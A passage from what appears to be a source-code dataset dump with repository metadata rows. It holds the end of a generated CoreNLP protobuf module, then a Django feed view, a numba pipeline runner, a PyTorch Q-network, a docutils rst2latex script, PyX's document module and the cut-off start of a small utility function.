_DOCUMENT.fields_by_name['corefChain'].message_type = _COREFCHAIN
_DOCUMENT.fields_by_name['sentencelessToken'].message_type = _TOKEN
_DOCUMENT.fields_by_name['quote'].message_type = _QUOTE
_DOCUMENT.fields_by_name['mentions'].message_type = _NERMENTION
_SENTENCE.fields_by_name['token'].message_type = _TOKEN
_SENTENCE.fields_by_name['parseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['binarizedParseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['annotatedParseTree'].message_type = _PARSETREE
_SENTENCE.fields_by_name['kBestParseTrees'].message_type = _PARSETREE
_SENTENCE.fields_by_name['basicDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['collapsedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['collapsedCCProcessedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['alternativeDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['openieTriple'].message_type = _RELATIONTRIPLE
_SENTENCE.fields_by_name['kbpTriple'].message_type = _RELATIONTRIPLE
_SENTENCE.fields_by_name['entailedSentence'].message_type = _SENTENCEFRAGMENT
_SENTENCE.fields_by_name['enhancedDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['enhancedPlusPlusDependencies'].message_type = _DEPENDENCYGRAPH
_SENTENCE.fields_by_name['entity'].message_type = _ENTITY
_SENTENCE.fields_by_name['relation'].message_type = _RELATION
_SENTENCE.fields_by_name['mentions'].message_type = _NERMENTION
_SENTENCE.fields_by_name['mentionsForCoref'].message_type = _MENTION
_TOKEN.fields_by_name['timexValue'].message_type = _TIMEX
_TOKEN.fields_by_name['operator'].message_type = _OPERATOR
_TOKEN.fields_by_name['polarity'].message_type = _POLARITY
_TOKEN.fields_by_name['span'].message_type = _SPAN
_TOKEN.fields_by_name['conllUFeatures'].message_type = _MAPSTRINGSTRING
_TOKEN.fields_by_name['conllUTokenSpan'].message_type = _SPAN
_TOKEN.fields_by_name['conllUSecondaryDeps'].message_type = _MAPINTSTRING
_PARSETREE.fields_by_name['child'].message_type = _PARSETREE
_PARSETREE.fields_by_name['sentiment'].enum_type = _SENTIMENT
_DEPENDENCYGRAPH_NODE.containing_type = _DEPENDENCYGRAPH
_DEPENDENCYGRAPH_EDGE.fields_by_name['language'].enum_type = _LANGUAGE
_DEPENDENCYGRAPH_EDGE.containing_type = _DEPENDENCYGRAPH
_DEPENDENCYGRAPH.fields_by_name['node'].message_type = _DEPENDENCYGRAPH_NODE
_DEPENDENCYGRAPH.fields_by_name['edge'].message_type = _DEPENDENCYGRAPH_EDGE
_COREFCHAIN_COREFMENTION.containing_type = _COREFCHAIN
_COREFCHAIN.fields_by_name['mention'].message_type = _COREFCHAIN_COREFMENTION
_MENTION.fields_by_name['headIndexedWord'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['dependingVerb'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['headWord'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['speakerInfo'].message_type = _SPEAKERINFO
_MENTION.fields_by_name['sentenceWords'].message_type = _INDEXEDWORD
_MENTION.fields_by_name['originalSpan'].message_type = _INDEXEDWORD
_RELATION.fields_by_name['arg'].message_type = _ENTITY
_POLARITY.fields_by_name['projectEquivalence'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectForwardEntailment'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectReverseEntailment'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectNegation'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectAlternation'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectCover'].enum_type = _NATURALLOGICRELATION
_POLARITY.fields_by_name['projectIndependence'].enum_type = _NATURALLOGICRELATION
_NERMENTION.fields_by_name['timex'].message_type = _TIMEX
_RELATIONTRIPLE.fields_by_name['tree'].message_type = _DEPENDENCYGRAPH
DESCRIPTOR.message_types_by_name['Document'] = _DOCUMENT
DESCRIPTOR.message_types_by_name['Sentence'] = _SENTENCE
DESCRIPTOR.message_types_by_name['Token'] = _TOKEN
DESCRIPTOR.message_types_by_name['Quote'] = _QUOTE
DESCRIPTOR.message_types_by_name['ParseTree'] = _PARSETREE
DESCRIPTOR.message_types_by_name['DependencyGraph'] = _DEPENDENCYGRAPH
DESCRIPTOR.message_types_by_name['CorefChain'] = _COREFCHAIN
DESCRIPTOR.message_types_by_name['Mention'] = _MENTION
DESCRIPTOR.message_types_by_name['IndexedWord'] = _INDEXEDWORD
DESCRIPTOR.message_types_by_name['SpeakerInfo'] = _SPEAKERINFO
DESCRIPTOR.message_types_by_name['Span'] = _SPAN
DESCRIPTOR.message_types_by_name['Timex'] = _TIMEX
DESCRIPTOR.message_types_by_name['Entity'] = _ENTITY
DESCRIPTOR.message_types_by_name['Relation'] = _RELATION
DESCRIPTOR.message_types_by_name['Operator'] = _OPERATOR
DESCRIPTOR.message_types_by_name['Polarity'] = _POLARITY
DESCRIPTOR.message_types_by_name['NERMention'] = _NERMENTION
DESCRIPTOR.message_types_by_name['SentenceFragment'] = _SENTENCEFRAGMENT
DESCRIPTOR.message_types_by_name['RelationTriple'] = _RELATIONTRIPLE
DESCRIPTOR.message_types_by_name['MapStringString'] = _MAPSTRINGSTRING
DESCRIPTOR.message_types_by_name['MapIntString'] = _MAPINTSTRING
DESCRIPTOR.enum_types_by_name['Language'] = _LANGUAGE
DESCRIPTOR.enum_types_by_name['Sentiment'] = _SENTIMENT
DESCRIPTOR.enum_types_by_name['NaturalLogicRelation'] = _NATURALLOGICRELATION
Document = _reflection.GeneratedProtocolMessageType('Document', (_message.Message,), dict(
DESCRIPTOR = _DOCUMENT,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Document)
))
_sym_db.RegisterMessage(Document)
Sentence = _reflection.GeneratedProtocolMessageType('Sentence', (_message.Message,), dict(
DESCRIPTOR = _SENTENCE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Sentence)
))
_sym_db.RegisterMessage(Sentence)
Token = _reflection.GeneratedProtocolMessageType('Token', (_message.Message,), dict(
DESCRIPTOR = _TOKEN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Token)
))
_sym_db.RegisterMessage(Token)
Quote = _reflection.GeneratedProtocolMessageType('Quote', (_message.Message,), dict(
DESCRIPTOR = _QUOTE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Quote)
))
_sym_db.RegisterMessage(Quote)
ParseTree = _reflection.GeneratedProtocolMessageType('ParseTree', (_message.Message,), dict(
DESCRIPTOR = _PARSETREE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.ParseTree)
))
_sym_db.RegisterMessage(ParseTree)
DependencyGraph = _reflection.GeneratedProtocolMessageType('DependencyGraph', (_message.Message,), dict(
Node = _reflection.GeneratedProtocolMessageType('Node', (_message.Message,), dict(
DESCRIPTOR = _DEPENDENCYGRAPH_NODE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph.Node)
))
,
Edge = _reflection.GeneratedProtocolMessageType('Edge', (_message.Message,), dict(
DESCRIPTOR = _DEPENDENCYGRAPH_EDGE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph.Edge)
))
,
DESCRIPTOR = _DEPENDENCYGRAPH,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.DependencyGraph)
))
_sym_db.RegisterMessage(DependencyGraph)
_sym_db.RegisterMessage(DependencyGraph.Node)
_sym_db.RegisterMessage(DependencyGraph.Edge)
CorefChain = _reflection.GeneratedProtocolMessageType('CorefChain', (_message.Message,), dict(
CorefMention = _reflection.GeneratedProtocolMessageType('CorefMention', (_message.Message,), dict(
DESCRIPTOR = _COREFCHAIN_COREFMENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.CorefChain.CorefMention)
))
,
DESCRIPTOR = _COREFCHAIN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.CorefChain)
))
_sym_db.RegisterMessage(CorefChain)
_sym_db.RegisterMessage(CorefChain.CorefMention)
Mention = _reflection.GeneratedProtocolMessageType('Mention', (_message.Message,), dict(
DESCRIPTOR = _MENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Mention)
))
_sym_db.RegisterMessage(Mention)
IndexedWord = _reflection.GeneratedProtocolMessageType('IndexedWord', (_message.Message,), dict(
DESCRIPTOR = _INDEXEDWORD,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.IndexedWord)
))
_sym_db.RegisterMessage(IndexedWord)
SpeakerInfo = _reflection.GeneratedProtocolMessageType('SpeakerInfo', (_message.Message,), dict(
DESCRIPTOR = _SPEAKERINFO,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.SpeakerInfo)
))
_sym_db.RegisterMessage(SpeakerInfo)
Span = _reflection.GeneratedProtocolMessageType('Span', (_message.Message,), dict(
DESCRIPTOR = _SPAN,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Span)
))
_sym_db.RegisterMessage(Span)
Timex = _reflection.GeneratedProtocolMessageType('Timex', (_message.Message,), dict(
DESCRIPTOR = _TIMEX,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Timex)
))
_sym_db.RegisterMessage(Timex)
Entity = _reflection.GeneratedProtocolMessageType('Entity', (_message.Message,), dict(
DESCRIPTOR = _ENTITY,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Entity)
))
_sym_db.RegisterMessage(Entity)
Relation = _reflection.GeneratedProtocolMessageType('Relation', (_message.Message,), dict(
DESCRIPTOR = _RELATION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Relation)
))
_sym_db.RegisterMessage(Relation)
Operator = _reflection.GeneratedProtocolMessageType('Operator', (_message.Message,), dict(
DESCRIPTOR = _OPERATOR,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Operator)
))
_sym_db.RegisterMessage(Operator)
Polarity = _reflection.GeneratedProtocolMessageType('Polarity', (_message.Message,), dict(
DESCRIPTOR = _POLARITY,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.Polarity)
))
_sym_db.RegisterMessage(Polarity)
NERMention = _reflection.GeneratedProtocolMessageType('NERMention', (_message.Message,), dict(
DESCRIPTOR = _NERMENTION,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.NERMention)
))
_sym_db.RegisterMessage(NERMention)
SentenceFragment = _reflection.GeneratedProtocolMessageType('SentenceFragment', (_message.Message,), dict(
DESCRIPTOR = _SENTENCEFRAGMENT,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.SentenceFragment)
))
_sym_db.RegisterMessage(SentenceFragment)
RelationTriple = _reflection.GeneratedProtocolMessageType('RelationTriple', (_message.Message,), dict(
DESCRIPTOR = _RELATIONTRIPLE,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.RelationTriple)
))
_sym_db.RegisterMessage(RelationTriple)
MapStringString = _reflection.GeneratedProtocolMessageType('MapStringString', (_message.Message,), dict(
DESCRIPTOR = _MAPSTRINGSTRING,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.MapStringString)
))
_sym_db.RegisterMessage(MapStringString)
MapIntString = _reflection.GeneratedProtocolMessageType('MapIntString', (_message.Message,), dict(
DESCRIPTOR = _MAPINTSTRING,
__module__ = 'CoreNLP_pb2'
# @@protoc_insertion_point(class_scope:edu.stanford.nlp.pipeline.MapIntString)
))
_sym_db.RegisterMessage(MapIntString)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\031edu.stanford.nlp.pipelineB\rCoreNLPProtos'))
_DEPENDENCYGRAPH.fields_by_name['root'].has_options = True
_DEPENDENCYGRAPH.fields_by_name['root']._options = _descriptor._ParseOptions(descriptor_pb2.FieldOptions(), _b('\020\001'))
# @@protoc_insertion_point(module_scope)
| [
"chaganty@stanford.edu"
] | chaganty@stanford.edu |
34b10e72f10087aaa703323b4c4bb1e1fefdc4d2 | 5b7d5723b84f5011965aba18ebf0c080253b2fcb | /posts/views/feed.py | 607dc5b67c34d133f749e9e5c0c63d56c801c80a | [
"MIT"
] | permissive | ReDetection/vas3k.club | 5980e6849ccf2e67a380d80d23036ec09ed94453 | ad97fefca5ec52047b2daad77ddf2eb2aecb03b3 | refs/heads/master | 2023-06-11T19:48:56.730541 | 2020-08-12T17:44:26 | 2020-08-12T17:44:26 | 287,545,618 | 0 | 0 | MIT | 2020-08-14T13:58:31 | 2020-08-14T13:58:30 | null | UTF-8 | Python | false | false | 2,905 | py | from datetime import datetime, timedelta
from django.db.models import Q
from django.http import Http404
from django.shortcuts import get_object_or_404, render
from auth.helpers import auth_required
from common.pagination import paginate
from posts.models import Post, Topic
POST_TYPE_ALL = "all"
ORDERING_ACTIVITY = "activity"
ORDERING_NEW = "new"
ORDERING_TOP = "top"
ORDERING_TOP_WEEK = "top_week"
ORDERING_TOP_MONTH = "top_month"
@auth_required
def feed(request, post_type=POST_TYPE_ALL, topic_slug=None, ordering=ORDERING_ACTIVITY):
post_type = post_type or Post
if request.me:
request.me.update_last_activity()
posts = Post.objects_for_user(request.me)
else:
posts = Post.visible_objects()
# filter posts by type
if post_type != POST_TYPE_ALL:
posts = posts.filter(type=post_type)
# filter by topic
topic = None
if topic_slug:
topic = get_object_or_404(Topic, slug=topic_slug)
posts = posts.filter(topic=topic)
# hide non-public posts and intros from unauthorized users
if not request.me:
posts = posts.exclude(is_public=False).exclude(type=Post.TYPE_INTRO)
# exclude shadow banned posts, but show them in "new" tab
if ordering != ORDERING_NEW:
if request.me:
posts = posts.exclude(Q(is_shadow_banned=True) & ~Q(author_id=request.me.id))
else:
posts = posts.exclude(is_shadow_banned=True)
# no type and topic? probably it's the main page, let's apply some more filters
if not topic and post_type == POST_TYPE_ALL:
posts = posts.filter(is_visible_on_main_page=True)
# order posts by some metric
if ordering:
if ordering == ORDERING_ACTIVITY:
posts = posts.order_by("-last_activity_at")
elif ordering == ORDERING_NEW:
posts = posts.order_by("-published_at", "-created_at")
elif ordering == ORDERING_TOP:
posts = posts.order_by("-upvotes")
elif ordering == ORDERING_TOP_WEEK:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=7)
).order_by("-upvotes")
elif ordering == ORDERING_TOP_MONTH:
posts = posts.filter(
published_at__gte=datetime.utcnow() - timedelta(days=31)
).order_by("-upvotes")
else:
raise Http404()
# split results into pinned and unpinned posts on main page
pinned_posts = []
if ordering == ORDERING_ACTIVITY:
pinned_posts = posts.filter(is_pinned_until__gte=datetime.utcnow())
posts = posts.exclude(id__in=[p.id for p in pinned_posts])
return render(request, "posts/feed.html", {
"post_type": post_type or POST_TYPE_ALL,
"ordering": ordering,
"topic": topic,
"posts": paginate(request, posts),
"pinned_posts": pinned_posts,
})
| [
"me@vas3k.ru"
] | me@vas3k.ru |
5c3b9ce4daac002df7317fca1d9da2026544660a | 82205ef1622ef3bb3bd4982f6ddc52509686af8c | /numba2/pipeline.py | 6a3813352da9a461afdad7bd801f5f684e75bdd7 | [] | no_license | cooperliu101/numba-lang | 22f1567e17cd7cf831f254bf64bc7e3192c973c3 | 37abfcbb516175153e73474dababb2d89cba7a8b | refs/heads/master | 2021-07-21T14:35:23.943243 | 2013-11-15T12:07:53 | 2013-11-15T12:07:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | # -*- coding: utf-8 -*-
"""
Pipeline that determines phase ordering and execution.
"""
from __future__ import print_function, division, absolute_import
import dis
import types
import pykit.ir
#===------------------------------------------------------------------===
# Pipeline
#===------------------------------------------------------------------===
def run_pipeline(func, env, passes):
    """Run a sequence of transforms (functions or modules) over *func*.

    Before and after every stage, the current function is recorded under
    env['numba.state.crnt_func'] so transforms can find it.

    Returns the final (func, env) pair.
    """
    for stage in passes:
        env['numba.state.crnt_func'] = func
        func, env = apply_transform(stage, func, env)
    env['numba.state.crnt_func'] = func
    return func, env
def apply_transform(transform, func, env):
    """Apply a single transform; modules dispatch through their run() function.

    Falls back to (func, env) when the transform returns a falsy result.
    """
    if isinstance(transform, types.ModuleType):
        runner = transform.run
    else:
        runner = transform
    outcome = runner(func, env)
    outcome = _check_transform_result(transform, func, env, outcome)
    return outcome or (func, env)
def _check_transform_result(transform, func, env, result):
if result is not None and not isinstance(result, tuple):
if isinstance(result, pykit.ir.Function):
return result, env
if isinstance(transform, types.ModuleType):
transform = transform.run
transform = transform.__module__ + '.' + transform.__name__
raise ValueError(
"Expected (func, env) result in %r, got %s" % (transform, result))
return result | [
"markflorisson88@gmail.com"
] | markflorisson88@gmail.com |
da6271e4473c4f6128fa66d16c48da1dbdb346d2 | e9ada720b2ba54bdf26cce9b0d2bc010c66eca72 | /model.py | 7a09d58f62b2d9c5cb9e35ff7b41c55ff5f44152 | [] | no_license | ErnstDinkelmann/udacity_deeprl_banana_nav | 1038135390acd966d9e7cb27b107c991d04c14ba | cedd34475358b49ae0000a18280a72b8b5065f0e | refs/heads/master | 2020-04-03T10:37:16.175955 | 2018-12-06T10:23:52 | 2018-12-06T10:23:52 | 155,197,689 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
    """Actor (Policy) Model: maps a state vector to per-action Q-values."""

    def __init__(self, state_size, action_size, seed, int_hl_1_num_units=32, int_hl_2_num_units=32):
        """Initialize parameters and build model.

        Params
        ======
            state_size (int): Dimension of each state
            action_size (int): Dimension of each action
            seed (int): Random seed
            int_hl_1_num_units (int): Units in the first hidden layer
            int_hl_2_num_units (int): Units in the second hidden layer
        """
        super(QNetwork, self).__init__()
        # seed the RNG *before* the layers are created so weight init is reproducible
        self.seed = torch.manual_seed(seed)
        self.fc1 = nn.Linear(state_size, int_hl_1_num_units, bias=True)
        self.fc2 = nn.Linear(int_hl_1_num_units, int_hl_2_num_units, bias=True)
        self.fc3 = nn.Linear(int_hl_2_num_units, action_size)

    def forward(self, x):
        """Build a network that maps state -> action values."""
        # two ReLU hidden layers, linear output head
        return self.fc3(F.relu(self.fc2(F.relu(self.fc1(x)))))
| [
"ernst.dinkelmann@gmail.com"
] | ernst.dinkelmann@gmail.com |
f3e7ef114ef2471fbf5671381769253a62f14fce | f693c9c487d31a677f009afcdf922b4e7f7d1af0 | /biomixer-venv/bin/rst2latex.py | f2bf88ab2545f14b13e630bbf6232fa0aac977a0 | [
"MIT"
] | permissive | Shellowb/BioMixer | 9048b6c07fa30b83c87402284f0cebd11a58e772 | 1939261589fe8d6584a942a99f0308e898a28c1c | refs/heads/master | 2022-10-05T08:16:11.236866 | 2021-06-29T17:20:45 | 2021-06-29T17:20:45 | 164,722,008 | 1 | 3 | MIT | 2022-09-30T20:23:34 | 2019-01-08T19:52:12 | Python | UTF-8 | Python | false | false | 831 | py | #!/home/shello/Documents/BioMixer/biomixer-venv/bin/python
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
import locale
try:
    # pick up the user's locale for correct sorting/encoding behaviour
    locale.setlocale(locale.LC_ALL, '')
except locale.Error:
    # an unsupported/undefined locale is fine: fall back to the "C" default
    pass

from docutils.core import publish_cmdline

description = ('Generates LaTeX documents from standalone reStructuredText '
               'sources. '
               'Reads from <source> (default is stdin) and writes to '
               '<destination> (default is stdout). See '
               '<http://docutils.sourceforge.net/docs/user/latex.html> for '
               'the full reference.')

publish_cmdline(writer_name='latex', description=description)
| [
"marcelo.becerra@ug.uchile.cl"
] | marcelo.becerra@ug.uchile.cl |
93adb7797d8a7c1cc59d5a0b27f379fc78998961 | 3f2271fae5a2f8ffec65b1d679f8b9891f7259fe | /lib/python3.6/site-packages/pyx/document.py | bc91c41408822ca1be0b6c59754549f6df35fc77 | [] | no_license | VirSanctus/SpiderWeb | 7fffeae325a8987f971e4ce26c2e2cc26d70262c | ce4c2bbf2d0023ae63ecd9dd05d501588afb0760 | refs/heads/master | 2022-11-07T14:33:33.252843 | 2019-05-30T06:35:54 | 2019-05-30T06:35:54 | 189,094,755 | 0 | 1 | null | 2022-11-01T17:28:27 | 2019-05-28T20:00:11 | Python | UTF-8 | Python | false | false | 8,295 | py | # -*- encoding: utf-8 -*-
#
#
# Copyright (C) 2005-2011 Jörg Lehmann <joergl@users.sourceforge.net>
# Copyright (C) 2005-2011 André Wobst <wobsta@users.sourceforge.net>
#
# This file is part of PyX (http://pyx.sourceforge.net/).
#
# PyX is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# PyX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyX; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
import logging, sys
from . import bbox, pswriter, pdfwriter, svgwriter, trafo, style, unit
logger = logging.getLogger("pyx")
class paperformat:
def __init__(self, width, height, name=None):
self.width = width
self.height = height
self.name = name
paperformat.A5 = paperformat(148.5 * unit.t_mm, 210 * unit.t_mm, "A5")
paperformat.A4 = paperformat(210 * unit.t_mm, 297 * unit.t_mm, "A4")
paperformat.A3 = paperformat(297 * unit.t_mm, 420 * unit.t_mm, "A3")
paperformat.A2 = paperformat(420 * unit.t_mm, 594 * unit.t_mm, "A2")
paperformat.A1 = paperformat(594 * unit.t_mm, 840 * unit.t_mm, "A1")
paperformat.A0 = paperformat(840 * unit.t_mm, 1188 * unit.t_mm, "A0")
paperformat.A0b = paperformat(910 * unit.t_mm, 1370 * unit.t_mm, None) # dedicated to our friends in Augsburg
paperformat.Letter = paperformat(8.5 * unit.t_inch, 11 * unit.t_inch, "Letter")
paperformat.Legal = paperformat(8.5 * unit.t_inch, 14 * unit.t_inch, "Legal")
def _paperformatfromstring(name):
    """Look up a predefined paperformat by case-insensitive name, e.g. "a4".

    Raises AttributeError when no predefined format of that name exists.
    """
    return getattr(paperformat, name.capitalize())
class page:
    """A single page of output: a canvas plus page-layout options.

    The constructor only records the options; the page transformation and
    bounding box are computed in _process when one of the document writers
    emits the page.
    """

    def __init__(self, canvas, pagename=None, paperformat=None, rotated=0, centered=1, fittosize=0,
                 margin=1*unit.t_cm, bboxenlarge=1*unit.t_pt, bbox=None):
        self.canvas = canvas
        self.pagename = pagename
        # support for deprecated string specification of paper formats:
        # a string supports "+ ''", a paperformat instance (or None) raises
        # TypeError on the concatenation probe
        try:
            paperformat + ""
        except TypeError:
            self.paperformat = paperformat
        else:
            self.paperformat = _paperformatfromstring(paperformat)
            logger.warning("specification of paperformat by string is deprecated, use document.paperformat.%s instead" % paperformat.capitalize())
        self.rotated = rotated
        self.centered = centered
        self.fittosize = fittosize
        self.margin = margin
        self.bboxenlarge = bboxenlarge
        self.pagebbox = bbox

    def _process(self, processMethod, contentfile, writer, context, registry, bbox):
        """Emit the page via *processMethod*, filling the empty *bbox* in place."""
        # usually, it is the bbox of the canvas enlarged by self.bboxenlarge, but
        # it might be a different bbox as specified in the page constructor
        assert not bbox
        if self.pagebbox:
            bbox.set(self.pagebbox)
        else:
            bbox.set(self.canvas.bbox()) # this bbox is not accurate
            bbox.enlarge(self.bboxenlarge)

        # check whether we expect a page trafo and use a temporary canvas to insert the
        # page canvas
        if self.paperformat and (self.rotated or self.centered or self.fittosize) and bbox:
            # calculate the pagetrafo
            paperwidth, paperheight = self.paperformat.width, self.paperformat.height

            # center (optionally rotated) output on page
            if self.rotated:
                pagetrafo = trafo.rotate(90).translated(paperwidth, 0)
                if self.centered or self.fittosize:
                    if not self.fittosize and (bbox.height() > paperwidth or bbox.width() > paperheight):
                        logger.warning("content exceeds the papersize")
                    pagetrafo = pagetrafo.translated(-0.5*(paperwidth - bbox.height()) + bbox.bottom(),
                                                     0.5*(paperheight - bbox.width()) - bbox.left())
            else:
                # not rotated: the outer condition guarantees centered or fittosize here
                if not self.fittosize and (bbox.width() > paperwidth or bbox.height() > paperheight):
                    logger.warning("content exceeds the papersize")
                pagetrafo = trafo.translate(0.5*(paperwidth - bbox.width()) - bbox.left(),
                                            0.5*(paperheight - bbox.height()) - bbox.bottom())

            if self.fittosize:
                if 2*self.margin > paperwidth or 2*self.margin > paperheight:
                    raise ValueError("Margins too broad for selected paperformat. Aborting.")
                paperwidth -= 2 * self.margin
                paperheight -= 2 * self.margin
                # scale output to pagesize - margins
                if self.rotated:
                    sfactor = min(unit.topt(paperheight)/bbox.width_pt(), unit.topt(paperwidth)/bbox.height_pt())
                else:
                    sfactor = min(unit.topt(paperwidth)/bbox.width_pt(), unit.topt(paperheight)/bbox.height_pt())
                pagetrafo = pagetrafo.scaled(sfactor, sfactor, self.margin + 0.5*paperwidth, self.margin + 0.5*paperheight)

            bbox.transform(pagetrafo)
            from . import canvas as canvasmodule
            cc = canvasmodule.canvas()
            cc.insert(self.canvas, [pagetrafo])
        else:
            cc = self.canvas

        if processMethod != "processSVG":
            # for SVG we write the pyx defaults as part of the svg node attributes in the writer
            getattr(style.linewidth.normal, processMethod)(contentfile, writer, context, registry)
        if self.pagebbox:
            bbox = bbox.copy() # don't alter the bbox provided to the constructor -> use a copy
        getattr(cc, processMethod)(contentfile, writer, context, registry, bbox)

    def processPS(self, *args):
        """Emit this page as PostScript."""
        self._process("processPS", *args)

    def processPDF(self, *args):
        """Emit this page as PDF."""
        self._process("processPDF", *args)

    def processSVG(self, *args):
        """Emit this page as SVG."""
        self._process("processSVG", *args)
class _noclose:
def __init__(self, f):
self.f = f
def __enter__(self):
return self.f
def __exit__(self, type, value, tb):
pass
def _outputstream(file, suffix):
    """Return a context manager yielding a binary output stream.

    *file* may be None (derive the name from sys.argv[0]), "-" (stdout),
    an already-open binary stream (returned unclosed), or a filename
    (*suffix* is appended when missing).
    """
    if file is None:
        if not sys.argv[0].endswith(".py"):
            raise RuntimeError("could not auto-guess filename")
        return open("%s.%s" % (sys.argv[0][:-3], suffix), "wb")
    if file == "-":
        return _noclose(sys.stdout.buffer)
    try:
        # probe: does it behave like a writable binary stream?
        file.write(b"")
    except (AttributeError, TypeError):
        # no write() method (a filename) or bytes rejected (not binary):
        # fall through to the filename handling below
        if not file.endswith(".%s" % suffix):
            return open("%s.%s" % (file, suffix), "wb")
        return open(file, "wb")
    else:
        return _noclose(file)
class document:
    """A collection of page instances written out as the pages of one document."""

    def __init__(self, pages=None):
        # keep the caller's list object when one is given (no defensive copy)
        self.pages = [] if pages is None else pages

    def append(self, page):
        """Add a page to the end of the document."""
        self.pages.append(page)

    def writeEPSfile(self, file=None, **kwargs):
        with _outputstream(file, "eps") as stream:
            pswriter.EPSwriter(self, stream, **kwargs)

    def writePSfile(self, file=None, **kwargs):
        with _outputstream(file, "ps") as stream:
            pswriter.PSwriter(self, stream, **kwargs)

    def writePDFfile(self, file=None, **kwargs):
        with _outputstream(file, "pdf") as stream:
            pdfwriter.PDFwriter(self, stream, **kwargs)

    def writeSVGfile(self, file=None, **kwargs):
        with _outputstream(file, "svg") as stream:
            svgwriter.SVGwriter(self, stream, **kwargs)

    def writetofile(self, filename, **kwargs):
        """Pick the writer from the filename extension and write the document."""
        # order matters: ".eps" must be tested before ".ps"
        writers = [("eps", pswriter.EPSwriter),
                   ("ps", pswriter.PSwriter),
                   ("pdf", pdfwriter.PDFwriter),
                   ("svg", svgwriter.SVGwriter)]
        for suffix, writercls in writers:
            if filename.endswith(".{}".format(suffix)):
                with open(filename, "wb") as stream:
                    writercls(self, stream, **kwargs)
                return
        raise ValueError("unknown file extension")
| [
"avielpr@checkpoint.com"
] | avielpr@checkpoint.com |
f9c5746de643c287fa2b5dd1201e7b31848a3a50 | 0685bc7b88fa33b119edbd10b67649b12fcf2994 | /utils.py | 1fd7158a16643c3be185a58c61fc319b559310af | [] | no_license | fernandogarcia547/WebScraper | 6ea14c33b53fb096486d1e6ad1c621442464eb32 | 568b5a79c7fa5229d83941460fd5617605f535af | refs/heads/master | 2020-09-24T11:05:50.858262 | 2019-12-04T00:50:07 | 2019-12-04T00:50:07 | 225,746,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | def extractNumbers(xStr):
xDigits = [int(d) for d in xStr if d.isdigit()]
xNum = np.sum([digit*(10**exponent) for digit, exponent in
